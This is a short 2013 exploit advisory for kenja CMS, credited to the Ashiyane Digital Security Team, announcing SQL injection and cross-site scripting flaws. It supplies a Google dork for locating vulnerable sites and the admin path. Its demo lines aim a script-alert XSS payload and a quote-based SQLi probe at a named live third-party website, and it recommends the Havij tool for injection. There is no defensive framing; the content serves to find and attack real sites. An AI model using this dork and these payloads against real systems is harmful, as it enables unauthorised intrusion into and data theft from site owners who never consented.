facebook facebook twitter rss

kenja CMS Multiple Vulnerabilities

Author: Ashiyane Digital Security Team , Published: 27-03-2013
###############################################
# Exploit Title : kenja CMS Multiple Vulnerabilities
#
# Exploit Author : Ashiyane Digital Security Team
#
# Home : www.Ashiyane.org
#
# Security Risk : High - SQLi / XSS
#
# Vendor Page : http://www.kenja.com/
#
# Google Dork : "powered by kenja" &"id="
#
#################################################
# { SQLi InjecTion }
# SQLi vul location: Http://site/*.php?id=[SQLi]
#
# Admin Page : Http://site/admin
# ------------------
# ( Cross-site scripting )
# XSS vul location: Http://site/*.php?id=[XSS]
#
# * : Xss And SQLi vulns has in all cms php files .
#
# DEMO:
# ------------------------------------------------------------------------------------
# | Xss => www.abax.co.jp/product.php?id=1<script>alert(bY T3rm!nat0r5)</script>
# | SQLi=> www.abax.co.jp/product.php?id=1'
# ------------------------------------------------------------------------------------
#
# [ for inject SQL use Havij OR inject manually ]
#
# + Spacial TnX : Reza-S4T4n ,C4T , TrojanMan
# Alireza666 , milvar , Remove , B4b4K KH4TaR ,
# PrinceofHacking , sil3nt ,...
#################################################
# Greetz to: My Lord ALLAH
#################################################
#
# bY T3rm!nat0r5
#
#################

Like us on Facebook :